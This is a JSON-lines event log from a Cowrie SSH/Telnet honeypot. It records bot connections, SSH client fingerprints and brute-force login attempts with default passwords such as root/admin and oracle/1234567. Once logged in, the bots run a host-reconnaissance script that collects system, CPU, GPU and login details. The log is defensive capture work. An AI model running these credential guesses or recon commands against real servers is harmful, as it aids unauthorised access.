{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:28:06.408866Z","src_ip":"212.227.125.160","session":"59120b9cb0ae"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:28:08.953109Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:28:09.379129Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.379895Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.380834Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.381899Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.383085Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.384004Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.384799Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.385878Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.386529Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.387338Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.387838Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.388533Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.389109Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.594585Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.595637Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:28:09.596578Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56758,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbb4b269dfd5","protocol":"ssh","message":"New connection: 212.227.235.229:56758 (1.2.3.4:22) [session: cbb4b269dfd5]","sensor":"my-vps","timestamp":"2025-08-31T04:28:20.747125Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44348,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ba9e05c313a","protocol":"ssh","message":"New connection: 212.227.235.229:44348 (1.2.3.4:22) [session: 2ba9e05c313a]","sensor":"my-vps","timestamp":"2025-08-31T04:28:20.966841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:28:21.792739Z","src_ip":"212.227.235.229","session":"cbb4b269dfd5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:28:21.793441Z","src_ip":"212.227.235.229","session":"cbb4b269dfd5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:28:24.105977Z","src_ip":"212.227.235.229","session":"2ba9e05c313a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:28:24.107508Z","src_ip":"212.227.235.229","session":"2ba9e05c313a"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-31T04:28:25.240726Z","src_ip":"212.227.125.160","session":"59120b9cb0ae"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1234567","message":"login attempt [oracle/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T04:28:27.505507Z","src_ip":"212.227.235.229","session":"cbb4b269dfd5"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:28:29.266015Z","src_ip":"212.227.235.229","session":"cbb4b269dfd5"}
{"eventid":"cowrie.session.closed","duration":"30.0","message":"Connection lost after 30.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:28:30.880814Z","src_ip":"212.227.125.160","session":"59120b9cb0ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60894,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff53c76294f4","protocol":"ssh","message":"New connection: 212.227.235.229:60894 (1.2.3.4:22) [session: ff53c76294f4]","sensor":"my-vps","timestamp":"2025-08-31T04:28:32.757592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:28:32.975147Z","src_ip":"212.227.235.229","session":"ff53c76294f4"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T04:28:32.975845Z","src_ip":"212.227.235.229","session":"ff53c76294f4"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:28:36.857030Z","src_ip":"212.227.235.229","session":"ff53c76294f4"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:28:41.250022Z","src_ip":"212.227.235.229","session":"ff53c76294f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46502,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d92c491a3a9","protocol":"ssh","message":"New connection: 212.227.125.160:46502 (1.2.3.4:22) [session: 3d92c491a3a9]","sensor":"my-vps","timestamp":"2025-08-31T04:28:42.071550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:28:42.511606Z","src_ip":"212.227.125.160","session":"3d92c491a3a9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:28:42.512657Z","src_ip":"212.227.125.160","session":"3d92c491a3a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56114,"dst_ip":"1.2.3.4","dst_port":22,"session":"4016d398ea11","protocol":"ssh","message":"New connection: 212.227.125.160:56114 (1.2.3.4:22) [session: 4016d398ea11]","sensor":"my-vps","timestamp":"2025-08-31T04:28:42.729635Z"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1234567","message":"login attempt [oracle/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T04:28:44.662839Z","src_ip":"212.227.125.160","session":"3d92c491a3a9"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-31T04:28:44.982641Z","src_ip":"212.227.235.229","session":"2ba9e05c313a"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:28:46.450857Z","src_ip":"212.227.125.160","session":"3d92c491a3a9"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":56008,"dst_ip":"1.2.3.4","dst_port":23,"session":"41a95edd906e","protocol":"telnet","message":"New connection: 79.124.8.120:56008 (1.2.3.4:23) [session: 41a95edd906e]","sensor":"my-vps","timestamp":"2025-08-31T04:29:00.776115Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:29:00.819547Z","src_ip":"79.124.8.120","session":"41a95edd906e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:29:00.836412Z","src_ip":"79.124.8.120","session":"41a95edd906e"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.37","src_port":47504,"dst_ip":"1.2.3.4","dst_port":22,"session":"2efe4456beaf","protocol":"ssh","message":"New connection: 206.168.34.37:47504 (1.2.3.4:22) [session: 2efe4456beaf]","sensor":"my-vps","timestamp":"2025-08-31T04:29:02.171749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:29:02.286131Z","src_ip":"206.168.34.37","session":"2efe4456beaf"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-31T04:29:02.385129Z","src_ip":"206.168.34.37","session":"2efe4456beaf"}
{"eventid":"cowrie.session.closed","duration":"20.1","message":"Connection lost after 20.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:02.781713Z","src_ip":"212.227.125.160","session":"4016d398ea11"}
{"eventid":"cowrie.session.closed","duration":"45.5","message":"Connection lost after 45.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:06.459784Z","src_ip":"212.227.235.229","session":"2ba9e05c313a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33436,"dst_ip":"1.2.3.4","dst_port":23,"session":"248b2b58e7fa","protocol":"telnet","message":"New connection: 212.227.125.160:33436 (1.2.3.4:23) [session: 248b2b58e7fa]","sensor":"my-vps","timestamp":"2025-08-31T04:29:10.471109Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38506,"dst_ip":"1.2.3.4","dst_port":23,"session":"bfdf39185a39","protocol":"telnet","message":"New connection: 212.227.125.160:38506 (1.2.3.4:23) [session: bfdf39185a39]","sensor":"my-vps","timestamp":"2025-08-31T04:29:16.880480Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:29:17.542711Z","src_ip":"212.227.125.160","session":"bfdf39185a39"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:29:17.566021Z","src_ip":"212.227.125.160","session":"bfdf39185a39"}
{"eventid":"cowrie.session.closed","duration":"15.5","message":"Connection lost after 15.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:17.650032Z","src_ip":"206.168.34.37","session":"2efe4456beaf"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T04:29:17.793610Z","src_ip":"212.227.125.160","session":"bfdf39185a39"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:18.953238Z","src_ip":"212.227.125.160","session":"bfdf39185a39"}
{"eventid":"cowrie.session.closed","duration":2.076136827468872,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:18.956530Z","src_ip":"212.227.125.160","session":"bfdf39185a39"}
